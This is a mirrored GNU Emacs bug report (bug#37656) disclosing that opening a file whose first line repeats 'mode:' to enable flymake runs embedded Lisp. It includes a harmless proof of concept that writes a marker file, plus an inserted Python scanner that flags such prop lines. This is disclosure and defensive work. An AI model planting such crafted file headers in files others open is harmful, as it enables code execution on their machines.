unofficial mirror of bug-gnu-emacs@gnu.org 
From: adam plaice <plaice.adam+lists@gmail.com>
To: 37656@debbugs.gnu.org
Subject: bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x
Date: Tue, 8 Oct 2019 10:48:32 +0200	[thread overview]
Message-ID: <CAJw81da4=R1jMJ0enx6SbO7G1rzaL61K2kqbY+jxhe=AM-3vtQ@mail.gmail.com> (raw)

* To reproduce:

1. Create a file, say `~/foobar' (it could have an arbitrary
extension), with the following contents:

-*- mode: emacs-lisp; mode: flymake -*-

(eval-when-compile
  (with-temp-file "~/emacs_flymake_security_bug"
      (insert "Could have also executed any code.")))

2. Open the file with emacs:

emacs -Q ~/foobar

3. Inspect ~/emacs_flymake_security_bug:

cat ~/emacs_flymake_security_bug

* Expected result

~/emacs_flymake_security_bug does not exist.

* Actual result

~/emacs_flymake_security_bug does exist.

* Further information

This relies on the "deprecated" feature of allowing `mode: ' to be
repeated more than once, to also specify minor modes.  Just having:

-*- mode: flymake -*-

in, say, `~/foobar.el' would not trigger the security bug.  There may,
however, be alternative ways of triggering it that I haven't come up
with.


This was "inspired" by a very similar bug (concerning an external
package, editorconfig), described here:

https://illikainen.dev/blog/2019-10-06-editorconfig

Thank you and best regards,
Adam
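As an added example (not part of Adam's report and not Emacs code), a small defender-side scanner that parses the first-line `-*- ... -*-` prop line the way a reviewer would and flags the repeated `mode:` construct described above, as well as `eval:` entries; the sample file contents are constructed.

```python
# Added example (not from the bug report): a defender-side scanner that
# flags Emacs file-local variable constructs in the first-line prop line
# ("-*- ... -*-") which can make Emacs run code on visit, as in bug#37656:
# a repeated "mode:" that forces a minor mode such as flymake, or "eval:".
import re

PROP_LINE = re.compile(r"-\*-(.*?)-\*-")


def parse_prop_line(text):
    """Return (key, value) pairs from the prop line Emacs honours: the first
    line, or the second line when the first is a "#!" shebang."""
    lines = text.splitlines()
    if not lines:
        return []
    first = lines[0]
    if first.startswith("#!") and len(lines) > 1:
        first = lines[1]
    m = PROP_LINE.search(first)
    if not m:
        return []
    body = m.group(1).strip()
    if ":" not in body:
        # Shorthand form "-*- emacs-lisp -*-" means "mode: emacs-lisp".
        return [("mode", body)] if body else []
    pairs = []
    for item in body.split(";"):
        if ":" in item:
            key, value = item.split(":", 1)
            pairs.append((key.strip().lower(), value.strip()))
    return pairs


def prop_line_findings(text):
    """List human-readable reasons the prop line deserves review."""
    pairs = parse_prop_line(text)
    modes = [v for k, v in pairs if k == "mode"]
    findings = []
    if len(modes) > 1:
        # Second and later "mode:" entries are treated as minor modes and
        # enabled without asking, e.g. flymake on an emacs-lisp buffer.
        findings.append("repeated mode: forces minor modes %s" % modes[1:])
    for key, value in pairs:
        if key == "eval":
            findings.append("eval: in prop line: %s" % value)
    return findings


# Constructed sample mirroring the first line of the report's test file.
SAMPLE = "-*- mode: emacs-lisp; mode: flymake -*-\n(eval-when-compile nil)\n"
```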


In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9)
 of 2019-10-07 built on adam
Repository revision: 9839466b231b6384055b9b137405730876413cbe
Repository branch: master
Windowing system distributor 'The X.Org Foundation', version 11.0.11804000
System Description: Ubuntu 16.04.6 LTS

Recent messages:
For information about GNU Emacs and the GNU system, type C-h C-a.

Configured using:
 'configure --with-modules --without-pop'

Configured features:
XPM JPEG TIFF GIF PNG RSVG SOUND GPM DBUS GSETTINGS GLIB NOTIFY INOTIFY
ACL LIBSELINUX GNUTLS LIBXML2 FREETYPE HARFBUZZ M17N_FLT LIBOTF XFT ZLIB
TOOLKIT_SCROLL_BARS GTK3 X11 XDBE XIM MODULES THREADS PDUMPER LCMS2 GMP

Important settings:
  value of $LANG: en_GB.UTF-8
  locale-coding-system: utf-8-unix

Major mode: Lisp Interaction

Minor modes in effect:
  tooltip-mode: t
  global-eldoc-mode: t
  eldoc-mode: t
  electric-indent-mode: t
  mouse-wheel-mode: t
  tool-bar-mode: t
  menu-bar-mode: t
  file-name-shadow-mode: t
  global-font-lock-mode: t
  font-lock-mode: t
  blink-cursor-mode: t
  auto-composition-mode: t
  auto-encryption-mode: t
  auto-compression-mode: t
  line-number-mode: t
  transient-mark-mode: t

Load-path shadows:
None found.

Features:
(shadow sort mail-extr emacsbug message rmc puny dired dired-loaddefs
format-spec rfc822 mml easymenu mml-sec password-cache epa derived epg
epg-config gnus-util rmail rmail-loaddefs text-property-search time-date
subr-x seq byte-opt gv bytecomp byte-compile cconv mm-decode mm-bodies
mm-encode mail-parse rfc2231 mailabbrev gmm-utils mailheader cl-loaddefs
cl-lib sendmail rfc2047 rfc2045 ietf-drums mm-util mail-prsvr mail-utils
tooltip eldoc electric uniquify ediff-hook vc-hooks lisp-float-type
mwheel term/x-win x-win term/common-win x-dnd tool-bar dnd fontset image
regexp-opt fringe tabulated-list replace newcomment text-mode elisp-mode
lisp-mode prog-mode register page tab-bar menu-bar rfn-eshadow isearch
timer select scroll-bar mouse jit-lock font-lock syntax facemenu
font-core term/tty-colors frame cl-generic cham georgian utf-8-lang
misc-lang vietnamese tibetan thai tai-viet lao korean japanese eucjp-ms
cp51932 hebrew greek romanian slovak czech european ethiopic indian
cyrillic chinese composite charscript charprop case-table epa-hook
jka-cmpr-hook help simple abbrev obarray minibuffer cl-preloaded nadvice
loaddefs button faces cus-face macroexp files text-properties overlay
sha1 md5 base64 format env code-pages mule custom widget
hashtable-print-readable backquote threads dbusbind inotify lcms2
dynamic-setting system-font-setting font-render-setting move-toolbar gtk
x-toolkit x multi-tty make-network-process emacs)

Memory information:
((conses 16 44045 5448)
 (symbols 48 5971 1)
 (strings 32 15685 1582)
 (string-bytes 1 506409)
 (vectors 16 9198)
 (vector-slots 8 123144 8510)
 (floats 8 19 25)
 (intervals 56 186 0)
 (buffers 1000 11)
 (heap 1024 12431 1138))





Thread overview: 3+ messages
2019-10-08  8:48 adam plaice [this message]
2019-10-15 21:05 ` bug#37656: 27.0.50; Arbitrary code execution with special `mode:' adam plaice
2019-10-16 13:13 ` bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x Stefan Monnier